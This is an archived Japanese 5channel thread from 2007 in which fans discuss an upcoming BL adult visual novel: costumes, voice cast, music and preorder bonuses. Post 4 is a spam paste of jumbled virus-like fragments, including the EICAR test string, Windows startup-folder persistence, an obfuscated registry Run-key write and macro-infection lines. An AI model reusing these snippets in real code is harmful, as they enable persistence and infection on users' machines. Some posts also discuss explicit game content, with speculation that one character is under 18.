5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@BaseSon Spice*(ベースソンスパイス)総合スレ

1 :いけない名無しさん:2007/08/06(月) 12:10:42 ID:xoJRYZPD
公式サイト
http://www.tactics.ne.jp/~b_spice/

第1作 『新婚さん Sweet Sweet Honeymoon』
2007年冬発売予定

2 :いけない名無しさん:2007/08/06(月) 12:15:06 ID:xoJRYZPD
先日CG数枚とシチュが公開されたのう。
デフォルメ絵はあんまり好かないとおもってたけど風呂は萌えた(*´Д`)
主役2人のほかに2カプあって、そのほか脇キャラが数名だそうだが、
個人的には「新婚さん」であるところを重視して、
主役2人を濃く書いてほしいところだ。

3 :いけない名無しさん:2007/08/06(月) 12:43:04 ID:???
スレ立て乙ー。


メタボハルさんに馬鹿萌えしてみてくれw

4 :いけない名無しさん:2007/08/06(月) 13:25:06 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :いけない名無しさん:2007/08/06(月) 20:15:42 ID:???
きもい(;^ω^)

6 :いけない名無しさん:2007/08/07(火) 11:04:58 ID:???
おースレ立ったのか。

兄ブラが好きだから超期待。
ハルさん可愛いよハルさん

7 :いけない名無しさん:2007/08/07(火) 14:18:07 ID:???
スレ立て乙かれ!

キャスト誰かな?はやく知りたいよ

8 :いけない名無しさん:2007/08/07(火) 15:32:53 ID:???
立ってる!1乙

兄ブラゲーやったことないんだがシステムはどんな感じなんだろ
快適なのかしら

9 :いけない名無しさん:2007/08/08(水) 00:54:38 ID:???
ベースソンスパイス
って読むのか

スレ立て乙!発売楽しみだなー


10 :いけない名無しさん:2007/08/09(木) 10:03:10 ID:???
サブCPもアダルトシーンはあるんだろうか

11 :いけない名無しさん:2007/08/09(木) 18:58:20 ID:???
それは……あるだろ?
サブってバツイチ×ノンケ食いに、おちび生徒×ドジっ子教師だよな
ここ塗りが華やかで絵柄に合ってていいな

12 :いけない名無しさん:2007/08/09(木) 20:12:23 ID:???
そうすると文章は第三者視点なのかな
颯太郎視点じゃないのかな
どっちでも不自然じゃなきゃいいけど

13 :いけない名無しさん:2007/08/09(木) 20:12:32 ID:???
>おちび生徒×ドジっ子教師
がメインなら購入決定なのに
廊下で転んで書類ばらまきがかわいい

14 :いけない名無しさん:2007/08/09(木) 20:13:50 ID:???
メインではないにしろ、受け攻め完全固定の3カプだけなんだから、
それなりに濃く書かれるんじゃないかな?

15 :いけない名無しさん:2007/08/09(木) 21:15:29 ID:???
>>14
助言ありがとう
まだ、それだけで買えるほど愛が深まってないんで様子見中です
ドジっ子教師がかわいいだけじゃサイフの中身が許さないw
先は長いんで、気長にチェックします

16 :いけない名無しさん:2007/08/09(木) 21:34:13 ID:???
雑誌で見たコスプレ衣装の気合が凄いな、ここw

17 :いけない名無しさん:2007/08/09(木) 22:18:19 ID:???
衣装頑張ってるよなー
衣装デザはシナリオが服指定して絵師が描いてるんだっけか

18 :いけない名無しさん:2007/08/10(金) 11:30:06 ID:???
コスプレの充実っぷりは、製作陣の意気込みが感じられて結構好きだ
攻めの振袖姿の凝り方がすげえww

19 :いけない名無しさん:2007/08/10(金) 13:03:10 ID:???
どの雑誌かおしえてくれ
雑誌なんてジャンルとわずまったく買ってないぜ

20 :いけない名無しさん:2007/08/10(金) 21:34:58 ID:???
冷微じゃね

21 :いけない名無しさん:2007/08/10(金) 22:08:59 ID:???
公式サイトが更新されてるが、この服装パターンと同じものだろうか?
舞台用……きになるぜ

22 :いけない名無しさん:2007/08/13(月) 14:28:41 ID:???
「妻で攻×夫で受」ってのが俺の趣味にジャストミート。
はやくやりたい!

23 :いけない名無しさん:2007/08/14(火) 15:13:01 ID:???
>妻で攻×夫で受
>攻めの振袖姿
好みすぎる

24 :いけない名無しさん:2007/08/15(水) 20:06:10 ID:???
作り手の気合が感じるな

25 :いけない名無しさん:2007/08/16(木) 02:16:51 ID:???
公式サイト更新ktkr
……うおおおお!
こんなに発売がたのしみな作品はひさしぶりだ

26 :いけない名無しさん:2007/08/16(木) 02:18:13 ID:???
今まで公開されてる服装パターンをみると、季節は秋〜冬だろうか

27 :いけない名無しさん:2007/08/16(木) 04:58:57 ID:???
ttp://www.kaimeikan.co.jp/homan/video/hvdvd49L.jpg

28 :いけない名無しさん:2007/08/16(木) 10:11:26 ID:???
今号の冷微見て気づいたが、メインCPの受けと攻め
立ち絵で同じ柄のマフラー巻いてるな
そういうエピソードでもあるのかな

29 :いけない名無しさん:2007/08/24(金) 21:34:34 ID:???
ヘタレわんこ年下妻×年上強気美人亭主関白夫…こんなにピンポイントで
ツボをついた設定のゲームが発売されるなんて夢のようだ…楽しみすぐる!

30 :いけない名無しさん:2007/08/25(土) 02:58:35 ID:rho60MHe
サイト更新age

年上で夫で受・年下で妻で攻
ほんとこれは楽しみ
ってか同じ趣味の人がけっこういて感動w

31 :いけない名無しさん:2007/08/25(土) 20:36:00 ID:iouuj2Fr
何このショタ女顔好きに優しいゲーム
期待すぐるw

32 :いけない名無しさん:2007/08/28(火) 07:44:02 ID:???
円佳の服装パターン、スーツが一番似合ってないなw
(というか、他は、似合ってるけど、スーツはわざとらしい男装のようだw)

33 :いけない名無しさん:2007/08/30(木) 15:10:45 ID:???
中の人発表マダー?

34 :いけない名無しさん:2007/08/30(木) 16:40:48 ID:???
>>32
禿同、美人さんのス−ツ姿って結構萌えなんだが
あの立ち絵はなんか萌えないな…なんでだろ
あと手のポ−ズが何かス−ツに似合ってないような気がする
ス−ツ用の髪型も前髪の分け目が変にズラっぽく見えてしょうがないw

35 :いけない名無しさん:2007/08/30(木) 21:24:05 ID:???
中の人は付くのか付かないのか。
いや今のご時勢付くのが当然な流れなんだけどサ。

36 :いけない名無しさん:2007/09/01(土) 02:40:49 ID:???
教授服装パターンあんま変わらんなw
個人的にコートがツボ

37 :いけない名無しさん:2007/09/05(水) 19:29:08 ID:???
>>36
同意、コ−トいいよ、コ−ト
あと私服もうちょっと変えて欲しかったな

38 :いけない名無しさん:2007/09/08(土) 13:49:00 ID:???
夏コミで企業スペ行った人?
新婚さん一冊のためだけに外に並ぶ気力なくて買えなかった…(´・ω・`)

青衝撃みたいに、兄と窓口別けてくれたらなぁ…

39 :いけない名無しさん:2007/09/08(土) 22:14:05 ID:???
女声優とか付けないよね

40 :いけない名無しさん:2007/09/09(日) 02:53:57 ID:???
太一、セーラー服ってw
かわいいけど斬新さはないなー、見たまんま女子高生で通りそうだ
(セーラー服着るのって、どんな場面かな?
セーラー服着た太一にHされる修平先生とか期待w)

41 :いけない名無しさん:2007/09/09(日) 15:00:51 ID:???
颯太郎と太一は文化祭で新撰組の劇でもやるのだろうか

42 :いけない名無しさん:2007/09/09(日) 21:20:50 ID:???
ときにコレ、ノベルゲーなんだから当然エンディングがいくつかに分岐するんだろうが、
カプ完全固定だとどういうふうにパターン用意するんだろ?
ハッピーエンドとバッドエンドの2通りだけってこともあるまいが

43 :いけない名無しさん:2007/09/09(日) 21:43:32 ID:???
EDは少ないが途中分岐が多いんじゃないかとエスパー
コス衣装とか体位選択できたらいいのに・・・

44 :いけない名無しさん:2007/09/09(日) 23:04:11 ID:???
>>42
ぼくらはみんな、恋をするってゲームが
カプ固定の脇複数だったんだけど
あれの場合はメインルートで
脇キャラ相手のバッドエンドがあるのと
脇カプは結末が見れるか見れないかって程度の分岐だった

45 :いけない名無しさん:2007/09/12(水) 12:32:32 ID:???
公式
>次回更新は、9月14日です!
>ドジっ子教師の服装パターンを公開予定。 お楽しみに!
ちょっと、楽しみだ。かわいい衣装あればいいなww

46 :いけない名無しさん:2007/09/12(水) 20:27:22 ID:???
発売予定のBLゲについて考えるスレ2の895に
>新婚さん 12/21発売予定
って書いてあったけど雑誌情報かな?

まあ、9月14日にはわかるんだろうが
スーツばっかりじゃありませんように(・人・)
ドジっ子教師、レースいっぱいなフリフリエプロンドレス希望w


47 :いけない名無しさん:2007/09/13(木) 13:09:29 ID:???
おねがいだから中の人発表してくれ

48 :いけない名無しさん:2007/09/16(日) 02:29:50 ID:???
ドジッコ教師、更新キテターw
女装なかったけど、弓道着とか萌えだww

49 :いけない名無しさん:2007/09/16(日) 02:38:41 ID:???
頬染めんなwww
私服とコートかわいいなー

50 :いけない名無しさん:2007/09/16(日) 04:16:32 ID:???
私服いいな
というか私服とコートを見て、自分が「両手をつないでる姿勢」に萌えることに気づいた

51 :いけない名無しさん:2007/09/16(日) 09:28:34 ID:???
ブログ日記
>「あ、これ、修平の顔に○液かけて! そう、ドバっと!!」
ドバっってw当然、相手は太一なんだろうけど・・・ドバっとってww

修平先生の服装パターン眼鏡なしバージョンも欲しかったなぁ
特に舞台衣装は、眼鏡なしを見たかったな

52 :いけない名無しさん:2007/09/16(日) 11:00:48 ID:???
私服かわええなー、思いのほかwktkってきた。
いいよいいよ、お着替え。

53 :いけない名無しさん:2007/09/16(日) 12:33:23 ID:???
犬塚×教師だったら特攻してたのになあ
同じ年下×年上でも、この二人が見た目と設定の組み合わせど真ん中

54 :いけない名無しさん:2007/09/16(日) 14:34:04 ID:???
中の人マダー

55 :いけない名無しさん:2007/09/17(月) 04:40:09 ID:???
関西弁キャラというだけで不安になるのは俺だけじゃないはずだ
不自然なしゃべりかたになりませんように

56 :いけない名無しさん:2007/09/17(月) 05:46:50 ID:???
本体の次屯が大阪の会社だから大丈夫じゃない?

57 :いけない名無しさん:2007/09/17(月) 17:57:57 ID:???
中の人マダー

58 :いけない名無しさん:2007/09/18(火) 00:16:15 ID:???
関西弁なんてわからんからどうでもいいわ

59 :いけない名無しさん:2007/09/20(木) 09:11:20 ID:???
>次回更新は、9月21日です!
>イベントCG+少しのシナリオを合わせて更新予定です。
好きカプのイベントCG+シナリオだったらいいなw

60 :いけない名無しさん:2007/09/20(木) 19:48:58 ID:???
>54
>57
来たじゃん

61 :いけない名無しさん:2007/09/21(金) 09:24:12 ID:???
お願い‥キャスト発表‥

62 :いけない名無しさん:2007/09/21(金) 20:12:36 ID:???
来週声優発表だって

63 :いけない名無しさん:2007/09/21(金) 20:29:46 ID:???
催促見ててくれたのかな

64 :いけない名無しさん:2007/09/21(金) 21:07:51 ID:???
>>62
誰が来るのか楽しみだ

65 :いけない名無しさん:2007/09/21(金) 21:13:24 ID:???
音楽担当にたくまるキタ━━━(゚∀゚)━━━!!!

やべえ超楽しみ

66 :いけない名無しさん:2007/09/21(金) 21:30:33 ID:???
>>65
兄ブラでやってたからかな
自分も好きだから楽しみ

67 :いけない名無しさん:2007/09/22(土) 05:20:53 ID:???
応援サイト特典のために
何らかのサイトを即席で作ろうかと考えている不純な俺

68 :いけない名無しさん:2007/09/22(土) 16:21:22 ID:???
新婚さんのポストカードがついてくるそうですよ
http://www.bookman.co.jp/details359.html

69 :いけない名無しさん:2007/09/22(土) 23:05:19 ID:???
欲しいけど秋葉原で買わねばならんのか……きびしい

70 :いけない名無しさん:2007/09/23(日) 03:09:25 ID:???
酔っぱらいハルかわええな・・・(*´д`*)
8枚目は6枚目の続きかな。あー俄然楽しみになってきた

71 :いけない名無しさん:2007/09/23(日) 03:10:18 ID:???
ギャラリーのを入れ忘れたorz

72 :いけない名無しさん:2007/09/24(月) 13:16:14 ID:???
次回更新で中の人発表…なんか、準備良過ぎて驚いた。チカラ入ってるなーw

偽名でもバレバレだから楽しみにしてる。ハルー。

73 :いけない名無しさん:2007/09/24(月) 14:21:07 ID:???
できれば全員男声優がいいなあ

74 :いけない名無しさん:2007/09/26(水) 05:54:23 ID:???
え、女性の可能性なんてあったっけ?

75 :いけない名無しさん:2007/09/26(水) 10:13:23 ID:???
ショタキャラがいるからじゃね?

76 :いけない名無しさん:2007/09/26(水) 11:03:41 ID:???
円佳さんは女声優でもアリかな

77 :いけない名無しさん:2007/09/26(水) 14:55:14 ID:???
忘れてたけど女キャラもいるんだった。

ハルさんは男声優でダルさを上手く表現して欲しいw

78 :いけない名無しさん:2007/09/26(水) 19:33:45 ID:???
はるさんが女声優だったから個人的にかなり痛い
それだけは避けてくれ

意表をついて颯太郎が女声優ってのもなしだぞ

79 :いけない名無しさん:2007/09/26(水) 22:11:54 ID:???
>>76
意表をついてイシダアキラはどうだろうか

80 :いけない名無しさん:2007/09/26(水) 22:35:55 ID:???
>>79
美少女戦士の敵役じゃないかwww

81 :いけない名無しさん:2007/09/27(木) 10:20:19 ID:???
エロゲメーカーからの派生だから空気嫁ず女声優かもね
まぁ失ったぶん違う購買層も出る絵柄だろうけど

82 :いけない名無しさん:2007/09/27(木) 11:16:44 ID:???
しかしここは元々同人派生でコスプレといいカプ嗜好といい
製作者側の趣味丸出しだから、さすがに女性声優は使わないと思う
男性受けを狙うならちびっ子攻め×親父受けなんかやらんだろうし

83 :いけない名無しさん:2007/09/28(金) 01:46:19 ID:???
いよいよ中の人発表当日となったわけですが。

自分的にはキャラに合えば女性声優もありなんだけど
男声の方が萌えるんだよなーやっぱ

84 :いけない名無しさん:2007/09/28(金) 02:14:13 ID:???
受けが女声優だと喘ぎがまんま女だもんな・・・

85 :いけない名無しさん:2007/09/28(金) 07:02:57 ID:???
声優も気になるんだが、主題歌もかなり気になる
たくまる氏のボ−カル曲どんな風になるのかな


86 :いけない名無しさん:2007/09/28(金) 08:17:33 ID:???
>>82
>趣味丸出し
それを言うなら、キャストも某野球アニメのキャストが誰かしら来そうな予感がするんだがw
まさかな

87 :いけない名無しさん:2007/09/28(金) 09:22:53 ID:???
>キャストも某野球アニメのキャストが誰かしら来そうな予感がするんだがw
その予感が当たると嬉しいかも
まあ無理だろうけどw

88 :いけない名無しさん:2007/09/28(金) 17:59:51 ID:???
しかし1人位は混じってそうな予感www
ボブゲでよく見かける面子結構居たしな

89 :いけない名無しさん:2007/09/28(金) 19:55:54 ID:???
キャスト来てた。
とりあえず太一の中の人の為に特攻しようかな。
はるの中の人は本当によく出るなあ

90 :いけない名無しさん:2007/09/28(金) 19:56:19 ID:???
ちょww2人予想当たったww

91 :いけない名無しさん:2007/09/28(金) 20:04:01 ID:???
発売前人気投票か…

92 :いけない名無しさん:2007/09/28(金) 20:07:40 ID:???
86-88大当たりwww
演技とか安定してそうな人選で一安心
漏れも特攻予定

しかしこれ、年末発売なのに毎週頑張るなー


93 :いけない名無しさん:2007/09/28(金) 20:12:08 ID:???
他はみんな偽名なのに太一の人だけ表名だな、まあ今までも表名で18禁出た事あるし今更か

94 :いけない名無しさん:2007/09/28(金) 22:00:04 ID:???
ショタ風味のキャラがあんまり好みじゃなかったんで
これまで興味なかったんだけど、サンプルテキスト読んで購入決定。

BLゲーで攻め寄りの視点、それもへたれ攻めだなんてなんて貴重な…。

95 :いけない名無しさん:2007/09/29(土) 00:18:57 ID:???
青島よく出るなあ
つうかチータン・・・まだ若手なのに表でいいんすかwww
ボブゲじゃあんま見かけない気がするからwktk

96 :いけない名無しさん:2007/09/29(土) 00:59:21 ID:???
>95
太一の中の人、欄○で二作表名で出てるよ

ギャラリー新着にwktkが止まらない
プレビューブックでも思ったけど、裸エプロンに動揺してるのが受より攻ってのが萌える
ボブゲで乳首アップってのもあまり見ない気がするし、乳首責め期待出来る?

97 :いけない名無しさん:2007/09/29(土) 01:05:28 ID:???
乳首責めには自分もひそかにwktk
ホント、思ってた以上に期待値が上がってきたよ

98 :いけない名無しさん:2007/09/29(土) 01:08:05 ID:???
>>96
まじっすか(゚д゚)
あんま若手で18禁作品表名で出る人って聞いた事無いからびっくりしたわw

99 :いけない名無しさん:2007/09/29(土) 01:23:17 ID:???
欄丸二作や青衝撃の時は他のキャストも表名だったりしたから分かるが、
今回はみんな偽名なんだからチータンも偽名で良かったんじゃw

メインカプ以外のカプも描写が濃いといいな〜wktk

100 :いけない名無しさん:2007/09/29(土) 01:58:01 ID:???
くそうみんな声優トーク盛り上がってていいなあ、
俺は名前きいてもどんな人だかぜんぜん知らないよ。
とりあえず颯太郎とはるさんが女声優じゃないようでよかった。
全員男声優なの?

101 :いけない名無しさん:2007/09/29(土) 02:06:18 ID:???
>100
メインキャラは全員男性
裏名も既出のものばかりなんで、気になるならググるよろし

そういえば空野は欄丸の時も頑なに裏名だったなw

102 :いけない名無しさん:2007/09/29(土) 02:19:42 ID:???
>>99
鈴木さんの場合、アーツだからでは?
別ブランドになるが、Lamentoとかはアーツの笹沼さんは表名だったし(役がアレだったのにw)
最近の見てると、アーツはBLは表(コイビトとか内容があまりに過激なのは裏名?)で乙女は裏
って使い分けてるように見える

103 :いけない名無しさん:2007/09/29(土) 02:20:33 ID:???
そうかーありがとん。
やっぱ男キャラは男声優がいいね。
はやくサンプルボイス公開しないかなー。

声は関係ないけど、新トップ絵が激しく萌える

104 :いけない名無しさん:2007/09/29(土) 02:38:50 ID:???
新TOP絵
はるの薬指にちゃんと結婚指輪がはめられてるのが
可愛いな(*´∀`)


105 :いけない名無しさん:2007/09/29(土) 13:00:13 ID:???
アーツだからってことはないと思う

106 :いけない名無しさん:2007/09/29(土) 18:49:23 ID:???
はるさんがちと不安かな
乱○みたいな無理矢理ショタ声にならないかどうか・・・
喘ぎは良いんだが

107 :いけない名無しさん:2007/09/29(土) 22:11:08 ID:???
サイト更新もしっかりしてくれてるし何よりスタッフが気合入れて作っているのが
感じられてwktkが止まらない…ヘタレ年下攻めってだけで期待大なのに
消えゆくメーカーとかある中で元気に開発してるの見ると嬉しくなるよ

108 :いけない名無しさん:2007/09/29(土) 22:29:14 ID:???
作ってる側が楽しそうなのが感じられていいんだよな
ああいうノリが苦手な人にはキツいかもしれないんだけど

あと二ヶ月半くらいか…

109 :いけない名無しさん:2007/09/29(土) 22:35:45 ID:???
開発してる作品への愛が感じられていいよね、本当に好きで作ってるんだなって思うから

110 :いけない名無しさん:2007/09/30(日) 00:20:10 ID:???
ああいう乗りが嫌いなら見なきゃいいだけのことさっ

何か当初さほど注目されてなかったけど、じわじわ期待値上がってるよなww

111 :いけない名無しさん:2007/09/30(日) 01:01:31 ID:???
自分も最初は大したことはなかったんだけど
毎週熱心に更新してるし、スタッフさんがあくせく頑張ってるのが公式ブログとかで
解るから、週が近づく毎に期待が高まる感じだ

112 :いけない名無しさん:2007/09/30(日) 19:14:35 ID:???
バツイチ受けがあれば買うのに…!!

113 :いけない名無しさん:2007/09/30(日) 20:13:50 ID:???
個人的には教師が攻めだったら満点だったけど、それでも主役カプがドツボだから
それだけで特攻ケテーイ!ヘタレ攻めハァハァハァ

114 :いけない名無しさん:2007/10/01(月) 20:51:47 ID:???
キャスト発表が自分のド真ん中だし新TOP絵可愛いし


だぁぁ、ちょっと予約に走ってくるwww

115 :いけない名無しさん:2007/10/01(月) 21:59:53 ID:???
予約に走りたいところだが、特典物が出揃ってからにしようと
思ってる自分

116 :いけない名無しさん:2007/10/01(月) 22:50:40 ID:???
特典つく店全部片っ端から予約するつもりなんで情報共有よろしく
とりあえずソフマップで描き下ろしテレカ付き受付開始してます

117 :いけない名無しさん:2007/10/01(月) 23:43:40 ID:???
公式通販とかあるのかな
あるなら出来れば冊子系がいいな
描き下ろしなら何でも買う気ではいるけどね

118 :いけない名無しさん:2007/10/02(火) 02:18:02 ID:???
祖父仕事早いな!
冊子系が来るなら是非設定資料的なアイテムがほしい
でも書き下ろし来るならカード類でもいい

119 :いけない名無しさん:2007/10/03(水) 23:02:21 ID:???
冷微のコラム楽しみだー

120 :いけない名無しさん:2007/10/04(木) 15:26:20 ID:???
ttp://blog.mediaworks.co.jp/clacla/
スレにはあんまり関係ないけどここのSDキャラも楽しみだー

121 :いけない名無しさん:2007/10/04(木) 19:45:02 ID:???
冷微読んだ
テレフォンHとかツボすぐるwww
はるたん可愛いよはるたん(*´д`*)ハァハァ

122 :いけない名無しさん:2007/10/05(金) 21:55:14 ID:???
公式更新ktkr!
7日行ける人がうらやましい・・・
えっちなチラシが欲しいよー

123 :いけない名無しさん:2007/10/05(金) 21:58:52 ID:???
はるさんが可愛すぎるハアハア

124 :いけない名無しさん:2007/10/05(金) 22:03:11 ID:???
人気投票の各キャラのキャッチコピーが笑える
特に教授・・・おまwww

125 :いけない名無しさん:2007/10/05(金) 23:14:09 ID:???
せ/な/かのブログに記事載ってる・・・


126 :いけない名無しさん:2007/10/06(土) 03:09:28 ID:???
ううううううううわああああああああああああ
乳首!乳首!乳首!えろいな!!!!!(*゚∀゚)=3

127 :いけない名無しさん:2007/10/06(土) 14:21:03 ID:???
テンションあがってキター!!!
とりあえず黒い種馬に一票w

128 :いけない名無しさん:2007/10/06(土) 14:49:33 ID:???
http://www3.coara.or.jp/~chem/ist/tokitsu/tokitsukaze.html

129 :いけない名無しさん:2007/10/06(土) 20:44:21 ID:???
世界へタレ級タイトル王者
ツンデレ最強伝説
アメリカ帰りの黒い種馬
白い薔薇にはトゲがある
ちびっこタイフーン警報発令
史上最強のドジっ子中年
わんわん超特急
あれ?私、紅一点なハズなのに…


素敵杉だろこのキャッチコピー群www


テレホンH…元々男性向けやってると展開の破壊力が団地外だな>冷微

130 :いけない名無しさん:2007/10/06(土) 21:42:33 ID:???
コメディCGのふいんきも男性向けの名残を感じて楽しみ
冷微コラムの颯太郎ベール被って頬染めてなんてかわいい花嫁さんだー

131 :いけない名無しさん:2007/10/06(土) 22:06:21 ID:???
ところで明日はイベントですね!
ニヤニヤしながらデモ眺めてくる&えっちなチラシ貰ってくるよ

132 :いけない名無しさん:2007/10/06(土) 22:20:59 ID:???
>>131
テラ裏山です姉さん・・・
レポよろしく!

133 :いけない名無しさん:2007/10/07(日) 00:40:38 ID:???
<あれ?私、紅一点なハズなのに…
ふいたwww

134 :いけない名無しさん:2007/10/07(日) 00:42:16 ID:???
プレビューブックとやらは今から入手することはできないのかな

135 :いけない名無しさん:2007/10/07(日) 01:59:50 ID:???
>>134
快適、メッセ共に在庫あり
好きなところで買うといいよ

136 :いけない名無しさん:2007/10/07(日) 15:12:12 ID:???
スパークに行って来た
ブースには女性スタッフの方が二人と男性スタッフの方が一人いたよ
新婚さんのプレビューブックとポスカみたいなのがあった
チラシの感想としては新規の情報のようなものは無かったよ
デモも見てきたけど、可愛くて歌も良い感じだった
十分期待してて良いと思うよ
早く公式でみんなが見られるようになると良いな

137 :いけない名無しさん:2007/10/07(日) 15:23:11 ID:???
ポスカってなにー?ラミカでなくて?
聞いてないよー

138 :いけない名無しさん:2007/10/07(日) 16:02:42 ID:???
>ブースには女性スタッフの方が二人と男性スタッフの方が一人いたよ
花七さんと雛タンと林檎先生と予測

139 :いけない名無しさん:2007/10/07(日) 16:04:31 ID:???
林檎さんて誰?

140 :131:2007/10/07(日) 18:18:44 ID:???
スパークから帰還しますた
チラシは136も言う通り既出のCG(えっちなのは公式のエプロンの)
と情報のもの
デモの方では何枚か新規スチルがあったと思う
泣いてるはるさんを抱きしめる颯太郎の絵に禿萌え(*´Д`)ハァハァ
ムービーの曲、可愛かったね!
自分今までたくまるさんの作曲編曲しか知らなかったんだけど
歌声も爽やかで明るい感じで個人的にはぴったりだとオモたよ

141 :いけない名無しさん:2007/10/07(日) 18:22:52 ID:???
参加組さんお疲れー
>泣いてるはるさんを抱きしめる颯太郎の絵
うわあああああああなんだその萌えシチュは

142 :いけない名無しさん:2007/10/07(日) 19:01:54 ID:???
スパーク参加組、乙。

新婚さんも楽しみだが、ブランド自体のノリが楽しくていいなぁ。

143 :いけない名無しさん:2007/10/07(日) 19:18:29 ID:???
たくまるさんどんな声なのか楽しみだw
声高め?低い?
バラードとか?質問麦価ですまん

144 :いけない名無しさん:2007/10/07(日) 21:03:12 ID:???
声は高めかな?
アイドル系な感じ
曲は明るくてポップ調
作品の雰囲気にはあってたと思うよ
でも歌詞までは聞き取れなかったので残念

145 :いけない名無しさん:2007/10/07(日) 22:01:05 ID:???
早く公式でアップして欲しいな主題歌
楽しみだ

146 :いけない名無しさん:2007/10/07(日) 23:11:07 ID:???
たくまるさんのボーカルなら、たくまるさんの公式サイトで
フリーDLできる曲があるよ。
最近聞いたけど、凄く好きなタイプの声だったんで新婚さんのOPも楽しみ。

147 :いけない名無しさん:2007/10/09(火) 22:43:45 ID:???
今までへたれわんこは18歳だと勝手に思ってたんだけど
もしかしてそれだと年齢隠す必要ないのかな
じゃあプレビューブックのSSから考えて
17以下でツンデレとは6歳以上の差で
あ、でも18にならないと結婚出来なくね?
と思ったけどおじいちゃんの遺言なだけで
法律は関係ないのか

先日プレビューブック入手して妄想拡がりまくりんぐ
私\(^O^)/ハジマタ

148 :いけない名無しさん:2007/10/10(水) 02:31:46 ID:???
ほんとテレホンセクロスはえろいわ・・・

149 :いけない名無しさん:2007/10/10(水) 05:23:51 ID:???
法律上の結婚はこのばあい関係ないからなw

150 :いけない名無しさん:2007/10/10(水) 08:50:44 ID:???
ある意味ファンタジーだからなw

だが年の差は萌える

151 :いけない名無しさん:2007/10/10(水) 15:52:14 ID:???
美人な年上ツンデレ受けに振り回される年下ヘタレ攻め…なんという私のためのゲーム!
全私が感動の嵐!

152 :いけない名無しさん:2007/10/10(水) 17:49:11 ID:???
>151に全俺も激しく同意
それと不器用な職場恋愛も足しといてくれ
円佳かわいいよ円佳!

体験版が欲しいのでプレビューブック買ってしまった
これから読んでアンケ入れてくるよノシ

153 :いけない名無しさん:2007/10/10(水) 23:46:49 ID:???
体験版って郵送で送られてくるの?
てっきりwebにうpされるものだと・・・

154 :いけない名無しさん:2007/10/10(水) 23:58:02 ID:???
f/i/r/s/t/r/o/nにチラシupされてたー
新婚さんの後ろにハートマークついてるのワロタ

155 :いけない名無しさん:2007/10/11(木) 00:27:04 ID:???
>153
先行で送ってくれるorROM媒体で欲しい人ってことじゃないかと思ってた
あとは手作りパッケージが気になる人向けとか・・・
販促考えたら後々Webにアップはされると思うよー

156 :いけない名無しさん:2007/10/11(木) 00:46:10 ID:???
>>155
レスd
実家住まいなので郵送はきついなあ・・・
雑誌の付録とかにも付くんだろうか


157 :いけない名無しさん:2007/10/11(木) 18:27:05 ID:???
冷微の発売が12月始めだから、体験版が付録につくとしたら
その辺りかと思うが(微図ログは時期的にどうかな)
そういう希望はメーカー側に出してあげたほうが親切かと思う

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)